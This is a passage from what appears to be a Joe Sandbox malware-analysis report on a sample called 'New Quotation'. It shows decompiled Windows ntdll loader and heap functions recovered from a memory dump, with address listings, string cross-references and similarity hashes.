						 *_t87();
						_t92 = _v100;
						E1D7ED3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E1D7F16EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x1d8c37c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x1d8c37c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E1D851D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E1D812C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}































                                                                                                                                                                                          0x1d7c6574
                                                                                                                                                                                          0x1d7c657d
                                                                                                                                                                                          0x1d7c6581
                                                                                                                                                                                          0x1d7c658b
                                                                                                                                                                                          0x1d7c6590
                                                                                                                                                                                          0x1d7c6598
                                                                                                                                                                                          0x1d7c65a3
                                                                                                                                                                                          0x1d7c65a6
                                                                                                                                                                                          0x1d7c65ad
                                                                                                                                                                                          0x1d7c65b1
                                                                                                                                                                                          0x1d7c65b3
                                                                                                                                                                                          0x1d7c65b8
                                                                                                                                                                                          0x1d7c6637
                                                                                                                                                                                          0x1d7c6637
                                                                                                                                                                                          0x1d7c663a
                                                                                                                                                                                          0x1d7c663e
                                                                                                                                                                                          0x1d7c66fa
                                                                                                                                                                                          0x1d7c66fa
                                                                                                                                                                                          0x1d7c664c
                                                                                                                                                                                          0x1d7c6659
                                                                                                                                                                                          0x1d7c665f
                                                                                                                                                                                          0x1d7c6665
                                                                                                                                                                                          0x1d7c6667
                                                                                                                                                                                          0x1d7c666f
                                                                                                                                                                                          0x1d7c6678
                                                                                                                                                                                          0x1d7c667d
                                                                                                                                                                                          0x1d7c6684
                                                                                                                                                                                          0x1d7c6686
                                                                                                                                                                                          0x1d7c6692
                                                                                                                                                                                          0x1d7c6697
                                                                                                                                                                                          0x1d8298c3
                                                                                                                                                                                          0x1d8298d3
                                                                                                                                                                                          0x1d8298d3
                                                                                                                                                                                          0x1d8298d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8298ca
                                                                                                                                                                                          0x1d8298cd
                                                                                                                                                                                          0x1d8298cd
                                                                                                                                                                                          0x1d8298cd
                                                                                                                                                                                          0x1d8298d1
                                                                                                                                                                                          0x1d8298d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c669d
                                                                                                                                                                                          0x1d7c669d
                                                                                                                                                                                          0x1d7c66a4
                                                                                                                                                                                          0x1d7c66aa
                                                                                                                                                                                          0x1d7c66ac
                                                                                                                                                                                          0x1d7c66ac
                                                                                                                                                                                          0x1d7c66b0
                                                                                                                                                                                          0x1d7c66c9
                                                                                                                                                                                          0x1d7c66cb
                                                                                                                                                                                          0x1d7c66d7
                                                                                                                                                                                          0x1d7c66dc
                                                                                                                                                                                          0x1d7c66e1
                                                                                                                                                                                          0x1d7c66f6
                                                                                                                                                                                          0x1d7c66b2
                                                                                                                                                                                          0x1d7c66b2
                                                                                                                                                                                          0x1d7c66b2
                                                                                                                                                                                          0x1d7c66b5
                                                                                                                                                                                          0x1d7c66b7
                                                                                                                                                                                          0x1d7c66b7
                                                                                                                                                                                          0x1d7c66ba
                                                                                                                                                                                          0x1d7c66bf
                                                                                                                                                                                          0x1d7c66c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c66b2
                                                                                                                                                                                          0x1d7c66b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c65ba
                                                                                                                                                                                          0x1d7c65ba
                                                                                                                                                                                          0x1d7c65bf
                                                                                                                                                                                          0x1d7c65d5
                                                                                                                                                                                          0x1d7c65d9
                                                                                                                                                                                          0x1d829835
                                                                                                                                                                                          0x1d82983a
                                                                                                                                                                                          0x1d82983c
                                                                                                                                                                                          0x1d82983e
                                                                                                                                                                                          0x1d829859
                                                                                                                                                                                          0x1d82985e
                                                                                                                                                                                          0x1d829863
                                                                                                                                                                                          0x1d829863
                                                                                                                                                                                          0x1d829866
                                                                                                                                                                                          0x1d829868
                                                                                                                                                                                          0x1d82986a
                                                                                                                                                                                          0x1d82986a
                                                                                                                                                                                          0x1d82986d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82986d
                                                                                                                                                                                          0x1d7c65e2
                                                                                                                                                                                          0x1d7c65ec
                                                                                                                                                                                          0x1d7c65f1
                                                                                                                                                                                          0x1d7c65f4
                                                                                                                                                                                          0x1d7c65f7
                                                                                                                                                                                          0x1d7c65fb
                                                                                                                                                                                          0x1d7c660f
                                                                                                                                                                                          0x1d7c6614
                                                                                                                                                                                          0x1d7c661a
                                                                                                                                                                                          0x1d7c661c
                                                                                                                                                                                          0x1d7c661f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c661f
                                                                                                                                                                                          0x1d7c6602
                                                                                                                                                                                          0x1d7c6606
                                                                                                                                                                                          0x1d829875
                                                                                                                                                                                          0x1d82987a
                                                                                                                                                                                          0x1d82987c
                                                                                                                                                                                          0x1d82987e
                                                                                                                                                                                          0x1d829880
                                                                                                                                                                                          0x1d82989a
                                                                                                                                                                                          0x1d82989f
                                                                                                                                                                                          0x1d8298a4
                                                                                                                                                                                          0x1d8298a7
                                                                                                                                                                                          0x1d8298a9
                                                                                                                                                                                          0x1d8298ab
                                                                                                                                                                                          0x1d8298ab
                                                                                                                                                                                          0x1d8298ac
                                                                                                                                                                                          0x1d8298ae
                                                                                                                                                                                          0x1d8298b3
                                                                                                                                                                                          0x1d8298b4
                                                                                                                                                                                          0x1d8298b6
                                                                                                                                                                                          0x1d8298bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8298bd
                                                                                                                                                                                          0x1d7c660c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c6624
                                                                                                                                                                                          0x1d7c662a
                                                                                                                                                                                          0x1d7c662f
                                                                                                                                                                                          0x1d7c6636
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D829843
                                                                                                                                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D829885
                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1D829854, 1D829895
                                                                                                                                                                                          • LdrpLoadShimEngine, xrefs: 1D82984A, 1D82988B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 3446177414-3589223738
                                                                                                                                                                                          • Opcode ID: 785b5fdeefe92532d0c95f45562812c4d6b35c03c5733a028b8546e07527f500
                                                                                                                                                                                          • Instruction ID: 92fb5f25714077d14a7ef4b7acd7c39366007c329a021ba9c97ce5a205ac80f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 785b5fdeefe92532d0c95f45562812c4d6b35c03c5733a028b8546e07527f500
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A514435A00355DFCB04DBA8CCD8BEC77B6AB44364F050165E551AF2A5CB70BC40C782
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E1D7FD6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x1d8ac5e8);
				_t68 = E1D827BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x1d8c5da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x1d8c37c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d8c5dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d8c5da8 = 1;
				if( *0x1d8c65f0 != 0) {
					_t137 =  *0x1d8c91f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x1d8c91e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E1D7D4779(_t74, _t118);
				}
				if(( *0x1d8c391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x1d8c9234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x1d8c9234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x1d8c68c8;
					if( *0x1d8c68c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E1D850FC8();
							 *0x1d8c68c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E1D7FD8F0();
					}
					_t68 = E1D7FD898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x1d8c5da0; // 0x190a018
				L8:
				if(_t129 != 0x1d8c5d9c) {
					_t18 = _t129 - 0x10; // 0x190a008
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x1909bf8
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x70a69bf0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E1D7EDC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E1D7EF0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E1D7EDCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E1D7FD886();
					}
					goto L8;
				}
				_t119 =  *0x1d8c5b24; // 0x18e2b68
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E1D7EDC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x1d8c5b24; // 0x18e2b68
					E1D7EF0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E1D7FD88F();
				}
				goto L15;
			}


























                                                                                                                                                                                          0x1d7fd6d0
                                                                                                                                                                                          0x1d7fd6d2
                                                                                                                                                                                          0x1d7fd6d7
                                                                                                                                                                                          0x1d7fd6dc
                                                                                                                                                                                          0x1d7fd6e3
                                                                                                                                                                                          0x1d7fd6ed
                                                                                                                                                                                          0x1d7fd810
                                                                                                                                                                                          0x1d7fd813
                                                                                                                                                                                          0x1d7fd81f
                                                                                                                                                                                          0x1d7fd81f
                                                                                                                                                                                          0x1d7fd6f3
                                                                                                                                                                                          0x1d7fd6f9
                                                                                                                                                                                          0x1d7fd6fc
                                                                                                                                                                                          0x1d7fd6ff
                                                                                                                                                                                          0x1d7fd702
                                                                                                                                                                                          0x1d7fd709
                                                                                                                                                                                          0x1d83f0c2
                                                                                                                                                                                          0x1d83f0c2
                                                                                                                                                                                          0x1d7fd716
                                                                                                                                                                                          0x1d83f0cd
                                                                                                                                                                                          0x1d83f0e7
                                                                                                                                                                                          0x1d83f0ec
                                                                                                                                                                                          0x1d83f0ec
                                                                                                                                                                                          0x1d7fd71c
                                                                                                                                                                                          0x1d7fd71f
                                                                                                                                                                                          0x1d7fd724
                                                                                                                                                                                          0x1d7fd732
                                                                                                                                                                                          0x1d7fd86d
                                                                                                                                                                                          0x1d7fd873
                                                                                                                                                                                          0x1d7fd875
                                                                                                                                                                                          0x1d7fd877
                                                                                                                                                                                          0x1d7fd879
                                                                                                                                                                                          0x1d7fd87f
                                                                                                                                                                                          0x1d7fd87f
                                                                                                                                                                                          0x1d7fd738
                                                                                                                                                                                          0x1d7fd740
                                                                                                                                                                                          0x1d7fd742
                                                                                                                                                                                          0x1d7fd744
                                                                                                                                                                                          0x1d7fd744
                                                                                                                                                                                          0x1d7fd750
                                                                                                                                                                                          0x1d83f0f4
                                                                                                                                                                                          0x1d83f0f7
                                                                                                                                                                                          0x1d83f0fe
                                                                                                                                                                                          0x1d83f101
                                                                                                                                                                                          0x1d83f108
                                                                                                                                                                                          0x1d83f10b
                                                                                                                                                                                          0x1d83f10d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f113
                                                                                                                                                                                          0x1d83f117
                                                                                                                                                                                          0x1d7fd7ed
                                                                                                                                                                                          0x1d7fd7ed
                                                                                                                                                                                          0x1d7fd7f3
                                                                                                                                                                                          0x1d7fd7fa
                                                                                                                                                                                          0x1d83f13c
                                                                                                                                                                                          0x1d83f13f
                                                                                                                                                                                          0x1d83f145
                                                                                                                                                                                          0x1d83f14a
                                                                                                                                                                                          0x1d83f14a
                                                                                                                                                                                          0x1d83f13f
                                                                                                                                                                                          0x1d7fd800
                                                                                                                                                                                          0x1d7fd804
                                                                                                                                                                                          0x1d7fd806
                                                                                                                                                                                          0x1d7fd806
                                                                                                                                                                                          0x1d7fd80b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fd80b
                                                                                                                                                                                          0x1d7fd756
                                                                                                                                                                                          0x1d7fd756
                                                                                                                                                                                          0x1d7fd75a
                                                                                                                                                                                          0x1d7fd75d
                                                                                                                                                                                          0x1d7fd766
                                                                                                                                                                                          0x1d7fd76c
                                                                                                                                                                                          0x1d7fd76e
                                                                                                                                                                                          0x1d7fd76e
                                                                                                                                                                                          0x1d7fd771
                                                                                                                                                                                          0x1d7fd774
                                                                                                                                                                                          0x1d7fd774
                                                                                                                                                                                          0x1d7fd777
                                                                                                                                                                                          0x1d7fd77a
                                                                                                                                                                                          0x1d7fd77a
                                                                                                                                                                                          0x1d7fd77d
                                                                                                                                                                                          0x1d7fd782
                                                                                                                                                                                          0x1d7fd78d
                                                                                                                                                                                          0x1d7fd794
                                                                                                                                                                                          0x1d7fd799
                                                                                                                                                                                          0x1d7fd79f
                                                                                                                                                                                          0x1d7fd79f
                                                                                                                                                                                          0x1d7fd7a1
                                                                                                                                                                                          0x1d7fd7a7
                                                                                                                                                                                          0x1d7fd7ac
                                                                                                                                                                                          0x1d7fd7af
                                                                                                                                                                                          0x1d7fd7b2
                                                                                                                                                                                          0x1d7fd7b6
                                                                                                                                                                                          0x1d7fd7da
                                                                                                                                                                                          0x1d7fd7da
                                                                                                                                                                                          0x1d7fd7b8
                                                                                                                                                                                          0x1d7fd7b9
                                                                                                                                                                                          0x1d7fd7c0
                                                                                                                                                                                          0x1d7fd7c5
                                                                                                                                                                                          0x1d7fd7cc
                                                                                                                                                                                          0x1d7fd7cf
                                                                                                                                                                                          0x1d7fd7cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fd782
                                                                                                                                                                                          0x1d7fd7e1
                                                                                                                                                                                          0x1d7fd7e7
                                                                                                                                                                                          0x1d7fd7eb
                                                                                                                                                                                          0x1d7fd820
                                                                                                                                                                                          0x1d7fd827
                                                                                                                                                                                          0x1d7fd82c
                                                                                                                                                                                          0x1d7fd832
                                                                                                                                                                                          0x1d7fd834
                                                                                                                                                                                          0x1d7fd83a
                                                                                                                                                                                          0x1d7fd83f
                                                                                                                                                                                          0x1d7fd842
                                                                                                                                                                                          0x1d7fd84a
                                                                                                                                                                                          0x1d7fd84f
                                                                                                                                                                                          0x1d7fd856
                                                                                                                                                                                          0x1d7fd856
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1D7FD879
                                                                                                                                                                                            • Part of subcall function 1D7D4779: RtlDebugPrintTimes.NTDLL ref: 1D7D4817
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 3446177414-1975516107
                                                                                                                                                                                          • Opcode ID: 6aef74f476b6c26e18e982aca7c1cca2fe183654b3b90856ce11e703c1b873a1
                                                                                                                                                                                          • Instruction ID: 8a72cbcae321140423825cb1168d1567c14dc21e905b0144bc3e1d841816d368
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aef74f476b6c26e18e982aca7c1cca2fe183654b3b90856ce11e703c1b873a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A512475A08355DFCB24CFA8C4887DDBBF1BF08324F15815AD5646B391D770A942CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 19%
                                                                                                                                                                                          			E1D7FDA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E1D899335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D88F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x1d8c376c; // 0x0
					 *0x1d8c91e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D7CB910();
					} else {
						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D7CB910("Invalid heap signature for heap at %p", _t93);
					E1D7CB910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E1D7CB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8c47a1 = 1;
						asm("int3");
						 *0x1d8c47a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E1D86AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E1D7FFEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E1D7FBAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E1D7FF300(_t92, _t74);
					}
				}
				goto L6;
			}



















                                                                                                                                                                                          0x1d7fda2a
                                                                                                                                                                                          0x1d7fda35
                                                                                                                                                                                          0x1d83f408
                                                                                                                                                                                          0x1d7fda90
                                                                                                                                                                                          0x1d7fda96
                                                                                                                                                                                          0x1d7fda9b
                                                                                                                                                                                          0x1d83f510
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f51f
                                                                                                                                                                                          0x1d7fdaa6
                                                                                                                                                                                          0x1d7fdaa9
                                                                                                                                                                                          0x1d83f537
                                                                                                                                                                                          0x1d83f53f
                                                                                                                                                                                          0x1d83f53f
                                                                                                                                                                                          0x1d83f537
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fdaaf
                                                                                                                                                                                          0x1d7fdaa1
                                                                                                                                                                                          0x1d7fdaa1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fdaa1
                                                                                                                                                                                          0x1d7fda42
                                                                                                                                                                                          0x1d83f413
                                                                                                                                                                                          0x1d83f41b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f421
                                                                                                                                                                                          0x1d7fda4f
                                                                                                                                                                                          0x1d83f432
                                                                                                                                                                                          0x1d83f451
                                                                                                                                                                                          0x1d83f456
                                                                                                                                                                                          0x1d83f434
                                                                                                                                                                                          0x1d83f449
                                                                                                                                                                                          0x1d83f44e
                                                                                                                                                                                          0x1d83f462
                                                                                                                                                                                          0x1d83f471
                                                                                                                                                                                          0x1d83f476
                                                                                                                                                                                          0x1d83f47b
                                                                                                                                                                                          0x1d83f48d
                                                                                                                                                                                          0x1d83f48f
                                                                                                                                                                                          0x1d83f496
                                                                                                                                                                                          0x1d83f497
                                                                                                                                                                                          0x1d83f497
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f49e
                                                                                                                                                                                          0x1d7fda59
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fda5b
                                                                                                                                                                                          0x1d7fda66
                                                                                                                                                                                          0x1d7fda6d
                                                                                                                                                                                          0x1d7fda6d
                                                                                                                                                                                          0x1d7fda71
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fda73
                                                                                                                                                                                          0x1d7fda77
                                                                                                                                                                                          0x1d7fda7f
                                                                                                                                                                                          0x1d7fda80
                                                                                                                                                                                          0x1d7fda84
                                                                                                                                                                                          0x1d7fda8a
                                                                                                                                                                                          0x1d83f4a8
                                                                                                                                                                                          0x1d83f4ab
                                                                                                                                                                                          0x1d83f4ab
                                                                                                                                                                                          0x1d83f4b0
                                                                                                                                                                                          0x1d83f4b3
                                                                                                                                                                                          0x1d83f4b8
                                                                                                                                                                                          0x1d83f4c1
                                                                                                                                                                                          0x1d83f4c1
                                                                                                                                                                                          0x1d83f4c4
                                                                                                                                                                                          0x1d83f4c8
                                                                                                                                                                                          0x1d83f4cb
                                                                                                                                                                                          0x1d83f4ce
                                                                                                                                                                                          0x1d83f4d5
                                                                                                                                                                                          0x1d83f4d8
                                                                                                                                                                                          0x1d83f4db
                                                                                                                                                                                          0x1d83f4e1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f4e7
                                                                                                                                                                                          0x1d83f4ec
                                                                                                                                                                                          0x1d83f4ec
                                                                                                                                                                                          0x1d83f4f0
                                                                                                                                                                                          0x1d83f4f3
                                                                                                                                                                                          0x1d83f4f9
                                                                                                                                                                                          0x1d83f503
                                                                                                                                                                                          0x1d83f503
                                                                                                                                                                                          0x1d83f4f9
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                                                                                          • Opcode ID: de613d7c1fc806a3de9b7099b3f83cce2e4397649a2f6f11d76749917622f9d3
